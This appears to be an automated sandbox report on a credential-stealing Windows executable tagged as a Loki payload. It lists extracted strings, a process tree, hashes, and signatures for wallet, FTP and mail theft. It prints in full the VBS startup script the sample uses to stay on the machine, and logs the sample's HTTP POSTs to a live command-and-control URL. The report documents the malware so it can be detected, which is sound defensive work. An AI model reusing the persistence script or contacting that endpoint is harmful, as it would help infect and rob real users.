%s%s (*.%s)|*.%2:s
%s*.%s
%s (%s)|%1:s|%s
Graphics
Uh>"B
Uhk$B
Uh &B
UhQ5B
Uh$5B
Uhn4B
Uhs9B
D$*Ph
Uh6AB
\$4Vj
Uh%EB
comctl32.dll
InitCommonControlsEx
Uh=MB
GetMonitorInfoA
GetSystemMetrics
MonitorFromRect
MonitorFromWindow
MonitorFromPoint
>(r[j
GetMonitorInfo
DISPLAY
>(r[j
GetMonitorInfoA
DISPLAY
>(r[j
GetMonitorInfoW
DISPLAY
EnumDisplayMonitors
USER32.DLL
IExtendedHelpViewer|UB
UhJYB
Uha[B
Uhu^B
Uh-eB
UhqeB
SVhDgB
comctl32.dll
InitializeFlatSB
UninitializeFlatSB
FlatSB_GetScrollProp
FlatSB_SetScrollProp
FlatSB_EnableScrollBar
FlatSB_ShowScrollBar
FlatSB_GetScrollRange
FlatSB_GetScrollInfo
FlatSB_GetScrollPos
FlatSB_SetScrollPos
FlatSB_SetScrollInfo
FlatSB_SetScrollRange
Uh5jB
uxtheme.dll
OpenThemeData
CloseThemeData
DrawThemeBackground
DrawThemeText
GetThemeBackgroundContentRect
GetThemePartSize
GetThemeTextExtent
GetThemeTextMetrics
GetThemeBackgroundRegion
HitTestThemeBackground
DrawThemeEdge
DrawThemeIcon
IsThemePartDefined
IsThemeBackgroundPartiallyTransparent
GetThemeColor
GetThemeMetric
GetThemeString
GetThemeBool
GetThemeInt
GetThemeEnumValue
GetThemePosition
GetThemeFont
GetThemeRect
GetThemeMargins
GetThemeIntList
GetThemePropertyOrigin
SetWindowTheme
GetThemeFilename
GetThemeSysColor
GetThemeSysColorBrush
GetThemeSysBool
GetThemeSysSize
GetThemeSysFont
GetThemeSysString
GetThemeSysInt
IsThemeActive
IsAppThemed
GetWindowTheme
EnableThemeDialogTexture
IsThemeDialogTextureEnabled
GetThemeAppProperties
SetThemeAppProperties
GetCurrentThemeName
GetThemeDocumentationProperty
DrawThemeParentBackground
EnableTheming
Uh)tB
UhatB
UhAuB
Uh5vB
TIncludeItemEvent
Boolean
TOpenDialoghzB
InitialDirHyB
Color
Ctl3Dp!A
FileEditStyle
Color
Color
Cancel
Abort
Retry
Ignore
NoToAll
YesToAll
commdlg_help
commdlg_FindReplace
WndProcPtr%.8X%.8X
DragMode
Constraints
Shape
ShowHint
Anchors
AutoSize
DragMode
Enabled
IncrementalDisplay
PopupMenu
Proportional
ShowHint
Stretch
Transparent
Constraints
Shape
Style
ExtCtrls
ExtCtrls7
Anchors
BorderWidthHVE
Constraints
Ctl3D
UseDockManager
DragMode
Enabled
Locked
ParentBiDiMode
ParentBackground
ParentColor
ParentCtl3D
ParentFont
PopupMenu
TabOrder
TabStop
ExtCtrls
ExtCtrls/
AutoComplete
Constraints
DropDownCount
ItemHeight
ParentBiDiMode
ParentColor
ParentCtl3D
ParentFont
PopupMenu
TabOrder
TabStop
ColorA=%.8x
Clipbrd
Delphi Picture
Delphi Component
Action
GroupIndex
Caption
Enabled
NumGlyphs
ParentFont
ParentShowHint
PopupMenu
Spacing
Transparent
Buttons
ExtDlgs
ExtDlgs
PicturePanel
PictureLabel
PreviewButton
PREVIEWGLYPH
PaintPanel
PaintBox
DLGTEMPLATE
PreviewForm
Panel
Image
DLGTEMPLATE
MAPI32.DLL
ComCtrls*
BorderWidth
DragMode
Orientation
ParentCtl3D
Position
SelStart
TabOrder
TickStyle
comctl32.dll
msctls_trackbar32
2001, 2002 Mike Lischke
UhK5C
TCustomLabelP6C
StdCtrls
StdCtrls'
Anchors
DragMode
ParentBiDiMode
ParentColor
ParentFont
PopupMenu
ShowAccelChar
ShowHint
Layout
Visible
TCustomEditt>C
TabStop0@C
TCustomComboBoxStrings0@C
StdCtrls
TCustomComboHAC
StdCtrls
TCustomComboBox,CC
StdCtrls
StdCtrls
TButtondGC
StdCtrls&
BiDiMode
Constraints
DragMode
ModalResult
ParentBiDiMode
ParentFont
PopupMenu
TabOrder
TabStop
Visible
TabStop$PC
TCheckBox$PC
StdCtrls+
Alignment
Caption
Constraints
DragMode
ParentBiDiMode
ParentColor
ParentCtl3D
ParentFont
PopupMenu
TabOrder
TabStop
Visible
TScrollEvent
TObject
Integer
TScrollBarTXC
StdCtrls&
Constraints
DragMode
PageSize
ParentBiDiMode
ParentCtl3D
Position
TabOrder
TabStop
TComboBoxStrings _C
StdCtrls
UhYhC
UhVjC
UholC
UhorC
Uh@|C
COMBOBOX
BUTTON
BUTTON
SCROLLBAR
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
MS_WINHELP
#32770
Controls
Controls
Controls
Controls
TMouseEvent
TObject
TMouseButton
TShiftState
Integer
Integer
TMouseMoveEvent
TObject
TShiftState
Integer
Integer
TKeyEvent
TShiftState
TKeyPressEvent
TDragOverEvent
TObject
Integer
Integer
Boolean
TDragDropEvent
TObject
Integer
Integer
TStartDragEvent
TDragObject
TEndDragEvent
TObject
Integer
Integer
TDockDropEvent
TDragDockObject
Integer
Integer
TDockOverEvent
TDragDockObject
Integer
Integer
Boolean
TUnDockEvent
Boolean
TStartDockEvent
TDragDockObject
TGetSiteInfoEvent
Boolean
TCanResizeEvent
Boolean
TConstrainedResizeEvent
Integer
TMouseWheelEvent
TObject
TShiftState
Boolean
TMouseWheelUpDownEvent
TObject
Boolean
TContextPopupEvent
Boolean
Controls
Controls
Controls
Controls
Controls
ImageType
OnChange
TCustomListControl
Controls
crDefault
crArrow
crCross
crIBeam
crSizeNESW
crSizeNS
crSizeNWSE
crSizeWE
crUpArrow
crHourGlass
crDrag
crNoDrop
crHSplit
crVSplit
crMultiDrag
crSQLWait
crAppStart
crHelp
crHandPoint
crSizeAll
crSize
%s (%s)
IsControl
UhP%D
ShdCD
Uh%0D
Uh34D
Uh55D
Uh+6D
C$PVj
UhR;D
Uh!=D
Php=D
DesignSize
UhvBD
,;=0;I
Uh|ID
Uh,XD
t&j7j
UhRgD
Uh"|D
;5,<H
USER32
WINNLSEnableIME
imm32.dll
ImmGetContext
ImmReleaseContext
ImmGetConversionStatus
ImmSetConversionStatus
ImmSetOpenStatus
ImmSetCompositionWindow
ImmSetCompositionFontA
ImmGetCompositionStringA
ImmIsIME
ImmNotifyIME
Delphi%.8X
ControlOfs%.8X%.8X
USER32
AnimateWindow
ActnList
ActnList
ActnList
ImgList
Bitmap
comctl32.dll
comctl32.dll
ImageList_WriteEx
TMenuChangeEvent
TMenuItem
Boolean
TMenuDrawItemEvent
TRect
Boolean
TAdvancedMenuDrawItemEvent
TRect
TOwnerDrawState
TMenuMeasureItemEvent
Integer
Action
Caption
SubMenuImages
Default
ImageIndex
ShortCut
AutoLineReduction
Images
OwnerDraw
AutoLineReduction
MenuAnimation
OwnerDraw
1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
ShortCutText
Uh>/E
6h`/E
UhSJE
UhiHE
Uh1OE
Uh8PE
Margin
Range
Size(QE
ThumbSize
Tracking
TScrollingWinControlTTE
FormsLVE
Forms7
Anchors
AutoScroll
BiDiModeHVE
Constraints
DragMode
Color
ParentBiDiMode
ParentBackground
ParentColor
ParentCtl3D
ParentFont
PopupMenu
TabOrder
TabStop
FormspaE
TCloseEvent
TCloseAction
TCloseQueryEvent
Boolean
TShortCutEvent
Boolean
Boolean
Forms
FormsU
Align
Anchors
AutoScroll
Color
Constraints
Ctl3D
UseDockManagerlaE
DefaultMonitor
DragMode
Enabled
OldCreateOrder
ObjectMenuItem
PrintScale
Scaled
ScreenSnap
VertScrollBar
WindowState
OnClickPbE
TCustomDockForm`tE
Forms
THintInfo@
TApplicationhwE
Forms
UhTyE
UhM}E
PixelsPerInch
TextHeight
IgnoreFontProperty
MDICLIENT
Ph@e@
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
layout text
TApplication
MAINICON
vcltest3.dll
RegisterAutomation
t<j@j
User32.dll
SetLayeredWindowAttributes
TaskbarCreated
TChartPen4 F
SmallDots
TChartHiddenPen$!F
TChartArrowPen<#F
HorizOffset
TCustomTeePanelLnF
TCustomTeePanel@mF
TeeProcs
TeeProcs
StartColor
TeeProcs
TChartFontObjectdrF
TeeProcs
Uh#tF
Arial
Uh;vF
Uhi{F
TEE_CURSOR_HAND
TeEngine
TeEngine'
Automatic
AutomaticMaximum
DateTimeFormat
Increment
Inverted
LabelsFont
LabelsMultiLine
LabelStyle
Minimum !F
PositionPercent
TickLength
TitleSize
TeEngine#
Automatic
AutomaticMaximum
DateTimeFormat
Increment
Inverted
LabelsFont
LabelsMultiLine
LabelStyle
Minimum !F
MinorTicks
TickLength
TitleSize
TAxisOnGetLabel
TChartSeries
String
TAxisOnGetNextLabel
TChartAxis
Boolean
TSeriesClick
TChartSeries
Integer
TMouseButton
TShiftState
Integer
Integer
TeEngine
TeEngine
BackColor
FontL F
Style
Transparent
Boolean
TSeriesOnAfterAdd
TChartSeries
Integer
TSeriesOnClear
TChartSeries
TSeriesOnGetMarkText
TChartSeries
String
Active
SeriesColor
+=4@H
DataSources
Identifier
Style
Uhj!G
UhL$G
Uh`?G
Series
Uh;@G
Uh)NG
TeeFunci
TeeFunci
TSubtractTeeFunctiontPG
TeeFunci
TMultiplyTeeFunctionTQG
TeeFunci
TDivideTeeFunction4RG
TeeFunci
TeeFunci
TLowTeeFunction@TG
TeeFunci
TeeFunci
Chart
TChartWall0\G
Color
Dark3DL F
LegendException$^G
TOnGetLegendText
TCustomAxisPanel
TLegendStyle
String
Chart
ColorWidth !F
FontL F
HorizMargin
Inverted0]G
MaxNumRows
VertMargin
Font !F
Framep!A
TChartClick
TCustomChart
TMouseButton
TShiftState
Integer
Integer
TChartClickAxis
TChartAxis
TMouseButton
TShiftState
Integer
Integer
TChartClickSeries
TChartSeries
Integer
TMouseButton
TShiftState
Integer
Integer
TOnGetLegendPos
TCustomChart
Integer
TOnGetLegendRect
TRect
TChartAllowScrollEvent
Boolean
TCustomChart`gG
Chart
TChart@iG
Chartf
AllowPanning
AllowZoom
BackImage
BackImageModeH\G
BackWallH\G
GradientH\G
MarginTop
OnClickAxis dG
OnClickLegend0eG
OnClickSeries dG
OnGetLegendPos\fG
OnZoom
Chart3DPercent
DepthAxisL F
MaxPointsPerPage
RightAxis
TopAxis
View3DOptions
OnGetAxisLabel ^G
BorderWidthHVE
Color
UseDockManager
DragMode
Enabled
ParentColor
PopupMenu
TabOrder
TabStop
Anchors
DragKind
WSACleanup
accept
closesocket
connect
ioctlsocket
getpeername
getsockname
getsockopt
htonl
htons
inet_addr
inet_ntoa
listen
ntohl
ntohs
recvfrom
select
sendto
setsockopt
shutdown
socket
gethostbyaddr
gethostbyname
gethostname
getservbyport
getservbyname
getprotobynumber
getprotobyname
WSASetLastError
WSAGetLastError
WSAIsBlocking
WSAUnhookBlockingHook
WSASetBlockingHook
WSACancelBlockingCall
WSAAsyncGetServByName
WSAAsyncGetServByPort
WSAAsyncGetProtoByName
WSAAsyncGetProtoByNumber
WSAAsyncGetHostByName
WSAAsyncGetHostByAddr
WSACancelAsyncRequest
WSAAsyncSelect
__WSAFDIsSet
WSAAccept
WSACloseEvent
WSAConnect
WSACreateEvent
WSADuplicateSocketA
WSADuplicateSocketW
WSAEnumNetworkEvents
WSAEnumProtocolsA
WSAEnumProtocolsW
WSAEventSelect
WSAGetOverlappedResult
WSAGetQosByName
WSAHtonl
WSAHtons
WSAIoctl
WSAJoinLeaf
WSANtohl
WSANtohs
WSARecv
WSARecvDisconnect
WSARecvFrom
WSAResetEvent
WSASend
WSASendDisconnect
WSASendTo
WSASetEvent
WSASocketA
WSASocketW
WSAWaitForMultipleEvents
WSAAddressToStringA
WSAAddressToStringW
WSAStringToAddressA
WSAStringToAddressW
WSALookupServiceBeginA
WSALookupServiceBeginW
WSALookupServiceNextA
WSALookupServiceNextW
WSALookupServiceEnd
WSAInstallServiceClassA
WSAInstallServiceClassW
WSARemoveServiceClass
WSAGetServiceClassInfoA
WSAGetServiceClassInfoW
WSAEnumNameSpaceProvidersA
WSAEnumNameSpaceProvidersW
WSAGetServiceClassNameByClassIdA
WSAGetServiceClassNameByClassIdW
WSASetServiceA
WSASetServiceW
WSAProviderConfigChange
TransmitFile
AcceptEx
GetAcceptExSockaddrs
WSARecvEx
uAhm'
WS2_32.DLL
WS2_32.DLL
WSAStartup
FALSE
IdBaseComponent
IdCoder
IdCoderMIME
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Mask5
Anchors
AutoSelect
BiDiModeHVE
Constraints
DragMode
MaxLength
ParentBiDiMode
ParentColor
ParentCtl3D
ParentFont
PopupMenu
ReadOnly
TabOrder
Uh1$H
Button1
Unit1
drfHLq2P0PBsf1fnYpfqu
E1niVXvCTaOXjRcPt8SqjJhx3eDh
Uhy(H
Uh9*H
Uhg*H
Error
Runtime error at 00000000
MS Sans Serif
jvjMj
qN,T)"
jOyb>
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
InterlockedDecrement
InterlockedIncrement
VirtualQuery
WideCharToMultiByte
MultiByteToWideChar
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
WriteFile
UnhandledExceptionFilter
RtlUnwind
RaiseException
GetStdHandle
user32.dll
GetKeyboardType
LoadStringA
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
kernel32.dll
lstrcpyA
WriteFile
WaitForSingleObject
VirtualQuery
VirtualAlloc
Sleep
SizeofResource
SetThreadLocale
SetFilePointer
SetEvent
SetErrorMode
SetEndOfFile
ResetEvent
ReadFile
MulDiv
LockResource
LoadResource
LoadLibraryA
LeaveCriticalSection
InitializeCriticalSection
GlobalUnlock
GlobalReAlloc
GlobalHandle
GlobalLock
GlobalFree
GlobalFindAtomA
GlobalDeleteAtom
GlobalAlloc
GlobalAddAtomA
GetVersionExA
GetVersion
GetTickCount
GetThreadLocale
GetTempPathA
GetSystemInfo
GetStringTypeExA
GetStdHandle
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLocalTime
GetLastError
GetFullPathNameA
GetFileSize
GetFileAttributesA
GetDiskFreeSpaceA
GetDateFormatA
GetCurrentThreadId
GetCurrentProcessId
GetCPInfo
GetACP
FreeResource
InterlockedExchange
FreeLibrary
FormatMessageA
FindResourceA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
ExitProcess
EnumCalendarInfoA
EnterCriticalSection
DeleteCriticalSection
CreateThread
CreateFileA
CreateEventA
CompareStringA
CloseHandle
version.dll
VerQueryValueA
GetFileVersionInfoSizeA
GetFileVersionInfoA
gdi32.dll
UnrealizeObject
TextOutA
StretchBlt
SetWindowOrgEx
SetWinMetaFileBits
SetViewportOrgEx
SetTextColor
SetTextAlign
SetStretchBltMode
SetROP2
SetPixel
SetEnhMetaFileBits
SetDIBColorTable
SetBrushOrgEx
SetBkMode
SetBkColor
SelectPalette
SelectObject
SelectClipRgn
ScaleWindowExtEx
SaveDC
RoundRect
RestoreDC
Rectangle
RectVisible
RealizePalette
Polyline
Polygon
PlayEnhMetaFile
PatBlt
MoveToEx
MaskBlt
LineTo
LPtoDP
IntersectClipRect
GetWindowOrgEx
GetWinMetaFileBits
GetTextMetricsA
GetTextExtentPoint32A
GetTextAlign
GetSystemPaletteEntries
GetStockObject
GetPixel
GetPaletteEntries
GetObjectA
GetEnhMetaFilePaletteEntries
GetEnhMetaFileHeader
GetEnhMetaFileBits
GetDeviceCaps
GetDIBits
GetDIBColorTable
GetDCOrgEx
GetCurrentPositionEx
GetClipBox
GetBrushOrgEx
GetBkMode
GetBkColor
GetBitmapBits
ExtTextOutA
ExtSelectClipRgn
ExtCreatePen
ExcludeClipRect
Ellipse
DeleteObject
DeleteEnhMetaFile
DeleteDC
CreateSolidBrush
CreateRectRgn
CreatePolygonRgn
CreatePenIndirect
CreatePalette
CreateHalftonePalette
CreateFontIndirectA
CreateDIBitmap
CreateDIBSection
CreateCompatibleDC
CreateCompatibleBitmap
CreateBrushIndirect
CreateBitmap
CopyEnhMetaFileA
BitBlt
user32.dll
CreateWindowExA
WindowFromPoint
WinHelpA
WaitMessage
UpdateWindow
UnregisterClassA
UnhookWindowsHookEx
TranslateMessage
TranslateMDISysAccel
TrackPopupMenu
SystemParametersInfoA
ShowWindow
ShowScrollBar
ShowOwnedPopups
ShowCursor
SetWindowsHookExA
SetWindowTextA
SetWindowPos
SetWindowPlacement
SetWindowLongA
SetTimer
SetScrollRange
SetScrollPos
SetScrollInfo
SetRect
SetPropA
SetParent
SetMenuItemInfoA
SetMenu
SetKeyboardState
SetForegroundWindow
SetFocus
SetCursor
SetClipboardData
SetClassLongA
SetCapture
SetActiveWindow
SendMessageA
ScrollWindow
ScreenToClient
RemovePropA
RemoveMenu
ReleaseDC
ReleaseCapture
RegisterWindowMessageA
RegisterClipboardFormatA
RegisterClassA
RedrawWindow
PtInRect
PostQuitMessage
PostMessageA
PeekMessageA
OpenClipboard
OffsetRect
OemToCharA
MessageBoxA
MessageBeep
MapWindowPoints
MapVirtualKeyA
LoadStringA
LoadKeyboardLayoutA
LoadIconA
LoadCursorA
LoadBitmapA
KillTimer
IsZoomed
IsWindowVisible
IsWindowEnabled
IsWindow
IsRectEmpty
IsIconic
IsDialogMessageA
IsChild
IsCharAlphaNumericA
IsCharAlphaA
InvalidateRect
IntersectRect
InsertMenuItemA
InsertMenuA
InflateRect
GetWindowThreadProcessId
GetWindowTextA
GetWindowRect
GetWindowPlacement
GetWindowLongA
GetWindowDC
GetTopWindow
GetSystemMetrics
GetSystemMenu
GetSysColorBrush
GetSysColor
GetSubMenu
GetScrollRange
GetScrollPos
GetScrollInfo
GetPropA
GetParent
GetWindow
GetMenuStringA
GetMenuState
GetMenuItemInfoA
GetMenuItemID
GetMenuItemCount
GetMenu
GetLastActivePopup
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
GetIconInfo
GetForegroundWindow
GetFocus
GetDlgItem
GetDesktopWindow
GetDCEx
GetDC
GetCursorPos
GetCursor
GetClipboardData
GetClientRect
GetClassNameA
GetClassInfoA
GetCapture
GetActiveWindow
FrameRect
FindWindowA
FillRect
EqualRect
EnumWindows
EnumThreadWindows
EnumClipboardFormats
EndPaint
EnableWindow
EnableScrollBar
EnableMenuItem
EmptyClipboard
DrawTextA
DrawMenuBar
DrawIconEx
DrawIcon
DrawFrameControl
DrawFocusRect
DrawEdge
DispatchMessageA
DestroyWindow
DestroyMenu
DestroyIcon
DestroyCursor
DeleteMenu
DefWindowProcA
DefMDIChildProcA
DefFrameProcA
CreatePopupMenu
CreateMenu
CreateIcon
CloseClipboard
ClientToScreen
CheckMenuItem
CallWindowProcA
CallNextHookEx
BeginPaint
CharNextA
CharLowerBuffA
CharLowerA
CharUpperBuffA
CharToOemA
AdjustWindowRectEx
ActivateKeyboardLayout
kernel32.dll
Sleep
oleaut32.dll
SafeArrayPtrOfIndex
SafeArrayGetUBound
SafeArrayGetLBound
SafeArrayCreate
VariantChangeType
VariantCopy
VariantClear
VariantInit
comctl32.dll
ImageList_SetIconSize
ImageList_GetIconSize
ImageList_Write
ImageList_Read
ImageList_GetDragImage
ImageList_DragShowNolock
ImageList_SetDragCursorImage
ImageList_DragMove
ImageList_DragLeave
ImageList_DragEnter
ImageList_EndDrag
ImageList_BeginDrag
ImageList_Remove
ImageList_DrawEx
ImageList_Replace
ImageList_Draw
ImageList_GetBkColor
ImageList_SetBkColor
ImageList_ReplaceIcon
ImageList_Add
ImageList_GetImageCount
ImageList_Destroy
ImageList_Create
InitCommonControls
comdlg32.dll
ChooseColorA
GetSaveFileNameA
GetOpenFileNameA
>!?.?
>">&>*>.>2>6>:>>>B>F>J>\>t>
>(?b?}?
>9?^?|?
>0?7?m?
?-?@?J?`?
?#?e?
? ?$?(?,?0?4?
:R;~>x?
<#=i>
= ><>
6 6$6(6,6064686<6@6D6H6
333333333333333333
33333333?333333
33?33
33833
333333333333333333
33333
333333333333333333
33333333?333333
33?33
33833
333333333333333333
33833
338?3
C33333833?33
3334JC33333338?333
333333333333333333
333333333333333333
33333
33333
3333333:3333333383
333333333333333333
33333
333333333333333333
333333333333333333
33333
33333
3333333:3333333383
333333333333333333
33333333
B^Anu.
lbOJmdP
lbOPmdP
lbOOmdP
lbOPmdP
lbOPmdP
lbOPmdP
lbOPmdP
lbOPmdP
lbOPmdP
lbOPmdP
lcPQh^J
j`MNlbN
7Project1
Clipbrd
SysUtils
System
SysInit
KWindows
UTypes
SysConst
Forms
sActiveX
3Messages
Printers
Consts
WWinSpool
^Classes
"RTLConsts
CVariants
$VarUtils
QTypInfo
+Graphics
CommCtrl
FlatSB
StdActns
YStrUtils
*ShellAPI
&Controls
5Themes
nComCtrls
ComStrs
ExtActns
0Mapi
EActnList
vMenus
Contnrs
ImgList
dStdCtrls
Dialogs
ExtCtrls
IDlgs
3CommDlg
(ShlObj
RegStr
?WinInet
UrlMon
ExtDlgs
Buttons
8Registry
IniFiles
CUxTheme
SyncObjs
RichEdit
ToolWin
ListActns
MultiMon
WinHelpViewer
RHelpIntfs
5MaskUtils
IdCoderMIME
uIdGlobal
IdStackWindows
IdException
|IdResourceStrings
yIdStack
@IdStackConsts
)IdWinSock2
EIdURI
IdCoder3to4
IdCoder
IdBaseComponent
Chart
*TeeConst
TeEngine
TeeProcs
!TeCanvas
7TeeFunci
Unit1
MaskEdit1
MaskEdit2
TChart
ebutton
clock
combobox
explorerbar
header
listview
progress
rebar
scrollbar
startpanel
status
taskband
taskbar
toolbar
tooltip
trackbar
traynotify
treeview
window
MAINICON
MS Sans Serif
This file is not on VirusTotal.

Process Tree


D1B132.exe, PID: 2912, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\D1B132.exe
Command Line: "C:\Users\user\AppData\Local\Temp\D1B132.exe"
stickiy.exe, PID: 2332, Parent PID: 2912
Full Path: C:\Users\user\AppData\Roaming\sticik\stickiy.exe
Command Line: "C:\Users\user\AppData\Roaming\sticik\stickiy.exe"
stickiy.exe, PID: 736, Parent PID: 2332
Full Path: C:\Users\user\AppData\Roaming\sticik\stickiy.exe
Command Line: "C:\Users\user\AppData\Roaming\sticik\stickiy.exe"
services.exe, PID: 460, Parent PID: 372
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
lsass.exe, PID: 1460, Parent PID: 460
Full Path: C:\Windows\sysnative\lsass.exe
Command Line: C:\Windows\system32\lsass.exe

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 199.192.27.109 [VT] United States

TCP

Source Source Port Destination Destination Port
192.168.35.21 49177 199.192.27.109 decvit.ga 80
192.168.35.21 49179 199.192.27.109 decvit.ga 80
192.168.35.21 49182 199.192.27.109 decvit.ga 80
192.168.35.21 49183 199.192.27.109 decvit.ga 80
192.168.35.21 49184 199.192.27.109 decvit.ga 80
192.168.35.21 49185 199.192.27.109 decvit.ga 80
192.168.35.21 49186 199.192.27.109 decvit.ga 80
192.168.35.21 49187 199.192.27.109 decvit.ga 80
192.168.35.21 49188 199.192.27.109 decvit.ga 80
192.168.35.21 49189 199.192.27.109 decvit.ga 80
192.168.35.21 49190 199.192.27.109 decvit.ga 80
192.168.35.21 49191 199.192.27.109 decvit.ga 80
192.168.35.21 49192 199.192.27.109 decvit.ga 80
192.168.35.21 49193 199.192.27.109 decvit.ga 80

UDP

Source Source Port Destination Destination Port
192.168.35.21 58094 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
decvit.ga [VT] A 199.192.27.109 [VT]

HTTP Requests

URI Data
http://decvit.ga/and/cat.php
POST /and/cat.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: decvit.ga
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 458C3AB2
Content-Length: 206
Connection: close

http://decvit.ga/and/cat.php
POST /and/cat.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: decvit.ga
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 458C3AB2
Content-Length: 179
Connection: close

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name stickiy.exe
Associated Filenames
C:\Users\user\AppData\Roaming\sticik\stickiy.exe
C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
File Size 853504 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 518281e0a10098565f6a635ec103bfb2
SHA1 3757e2735ec4cedc2dcfc02a93b6e7eaa46c8356
SHA256 b8b6ee5387befd762ecce0e146bd0a6465239fa0785869f05fa58bdd25335d3e
CRC32 42A578A1
Ssdeep 12288:aLNt0GIWI1BrDqqdlb0Z8qL8C0oCH67dOY7XGwJ4UNG3HuYAWEVULNio:ap2u+rw826SdT7XGwJ4UTcEVULUo
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name stickiy.exe:ZoneIdentifier
Associated Filenames
C:\Users\user\AppData\Roaming\sticik\stickiy.exe:ZoneIdentifier
File Size 0 bytes
File Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
Ssdeep 3::
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name sticik.vbs
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sticik.vbs
File Size 116 bytes
File Type ASCII text, with CRLF line terminators
MD5 cc14bee3224d46be87a51d05590fe659
SHA1 c3f389a1374e8e3a4df8b70200de9dd0c8abfb97
SHA256 d178b8a3aa30b687a7a880a16abb7b20da30908b82382049c951ce53498fcce8
CRC32 D6041E11
Ssdeep 3:AWEFmRGfGR0U4WPF8HocpkVkEaKC5LGPsMPLACH2:DEFmQulrPF8IOk/aZ5L7ALAf
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit fileDisplay Text
set ydjyFvJL = CreatEObject("wSCrIPt.ShELl")
yDjyfvjl.Run """C:\Users\user\AppData\Roaming\sticik\stickiy.exe"""
\x00
File name 6F2024.lck
Associated Filenames
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
File Size 1 bytes
File Type very short file (no magic)
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
CRC32 83DCEFB7
Ssdeep 3:U:U
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
Sorry! No CAPE files.
Process Name stickiy.exe
PID 736
Dump Size 647168 bytes
Module Path C:\Users\user\AppData\Roaming\sticik\stickiy.exe
Type PE image: 32-bit executable
MD5 5b66fb1c34287f7b43cc2c5fb2e54e1b
SHA1 1b54ff48d5dfd4748b91b9765cf0ec55c4a78732
SHA256 481235b2eba38cf89373eb111c0c4351464f36ca99e020870af694b76d17f625
CRC32 CD1A41F5
Ssdeep 1536:qzvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/Eq8Izmd:RSHIG6mQwGmfOQd8YhY0/EZUG
ClamAV None
Yara
  • HeavensGate - Heaven's Gate: Switch from 32-bit to 64-mode
CAPE Yara
  • Loki Payload
Dump Filename 481235b2eba38cf89373eb111c0c4351464f36ca99e020870af694b76d17f625
Download

Comments



No comments posted

Processing ( 10.191 seconds )

  • 3.507 CAPE
  • 2.614 Static
  • 1.516 TargetInfo
  • 1.504 Dropped
  • 0.35 BehaviorAnalysis
  • 0.275 ProcDump
  • 0.221 Deduplicate
  • 0.107 TrID
  • 0.055 Strings
  • 0.033 NetworkAnalysis
  • 0.005 AnalysisInfo
  • 0.003 config_decoder
  • 0.001 Debug

Signatures ( 0.247 seconds )

  • 0.021 antivm_vbox_libs
  • 0.018 stealth_timeout
  • 0.015 antiav_detectfile
  • 0.015 antiav_detectreg
  • 0.013 api_spamming
  • 0.012 decoy_document
  • 0.01 infostealer_bitcoin
  • 0.01 infostealer_ftp
  • 0.009 exec_crash
  • 0.008 antiav_avast_libs
  • 0.007 stealth_file
  • 0.006 exploit_getbasekerneladdress
  • 0.006 exploit_gethaldispatchtable
  • 0.006 antivm_vbox_files
  • 0.006 infostealer_im
  • 0.005 antivm_vmware_libs
  • 0.005 antisandbox_sunbelt_libs
  • 0.004 malicious_dynamic_function_loading
  • 0.004 Doppelganging
  • 0.004 antisandbox_sboxie_libs
  • 0.004 dynamic_function_loading
  • 0.004 antiav_bitdefender_libs
  • 0.004 infostealer_mail
  • 0.004 ransomware_files
  • 0.003 persistence_autorun
